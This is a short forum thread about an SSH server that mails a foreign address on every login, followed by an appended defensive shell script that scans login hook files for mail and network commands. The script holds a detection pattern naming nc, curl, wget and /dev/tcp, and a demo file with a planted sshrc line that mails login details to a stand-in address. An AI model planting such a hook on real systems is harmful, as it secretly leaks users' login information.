SSH login eavesdropping
tomii2 - 29-09-2009 19:12
Hello, I'm turning to you for help in solving my problem.
The problem is that every time I try to log in to the server via ssh (PuTTY), a mail is sent from the server (from the root account) to a foreign address (sniffps@gmail.com).
I don't need to explain how dangerous this is.
I can't find the source of the problem.
System: Debian Etch 4
PLEASE HELP
KeFaS - 30-09-2009 02:49
Show the server logs and the output of these commands run as root:
ps aux
netstat -a
lsof -i
tomii2 - 30-09-2009 07:59
Output of the command lsof -i
netstat -a
and ps -aux
Which server logs exactly do you mean?
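A mail that goes out on every SSH login is sent by something that runs at login and then exits, so a `ps`, `netstat` or `lsof` snapshot may not show it. The script below is an added example, not part of the thread: it scans the text files that sshd, PAM and the login shell read at login for mail or network commands. The file list, the pattern and the sample tree (with the address `collector@example.invalid`) are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example: flag mail/network commands in files that run on every SSH login.

# Mail or network clients used as commands, PAM/sshd exec hooks, any e-mail address.
HOOK_PATTERN='(^|[^[:alnum:]_.-])(mail|mailx|sendmail|mutt|nc|curl|wget)[[:space:]]|/dev/tcp/|pam_exec|pam_script|ForceCommand|[[:alnum:]._%+-]+@[[:alnum:].-]+[.][[:alpha:]]{2,}'

# Print the existing text files that sshd, PAM or the login shell read at login.
# $1 is an optional root prefix (for example a read-only mount of the disk).
login_hook_files() {
    root=${1%/}
    for f in \
        "$root"/etc/ssh/sshd_config "$root"/etc/ssh/sshrc \
        "$root"/etc/pam.d/sshd "$root"/etc/pam.d/common-session \
        "$root"/etc/profile "$root"/etc/profile.d/* "$root"/etc/bash.bashrc \
        "$root"/root/.ssh/rc "$root"/home/*/.ssh/rc \
        "$root"/root/.profile "$root"/home/*/.profile \
        "$root"/root/.bash_profile "$root"/home/*/.bash_profile \
        "$root"/root/.bash_login "$root"/home/*/.bash_login \
        "$root"/root/.bashrc "$root"/home/*/.bashrc
    do
        if [ -f "$f" ]; then printf '%s\n' "$f"; fi
    done
}

# Print file:line:text for every non-comment line that matches HOOK_PATTERN.
scan_login_hooks() {
    login_hook_files "${1:-}" | while IFS= read -r f; do
        { grep -nE -- "$HOOK_PATTERN" "$f" || true; } |
            { grep -vE '^[0-9]+:[[:space:]]*#' || true; } |
            while IFS= read -r hit; do printf '%s:%s\n' "$f" "$hit"; done
    done
}

# Constructed sample tree (not taken from the thread): one planted hook in sshrc.
make_demo_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/etc/ssh" "$t/etc/pam.d" "$t/root"
    printf 'PermitRootLogin yes\n' > "$t/etc/ssh/sshd_config"
    printf '# mail -s old test\nMAIL=/var/mail/$USER\n' > "$t/etc/profile"
    printf 'echo "$USER $SSH_CLIENT" | mail -s login collector@example.invalid\n' \
        > "$t/etc/ssh/sshrc"
    printf '%s\n' "$t"
}

# Demo run against the constructed tree; pass "" to scan the live system instead.
demo=$(make_demo_tree)
scan_login_hooks "$demo"
rm -rf "$demo"
```

A replaced sshd binary or PAM module will not show up in this scan; comparing installed files against package checksums (for example with `debsums`) from trusted media covers that case.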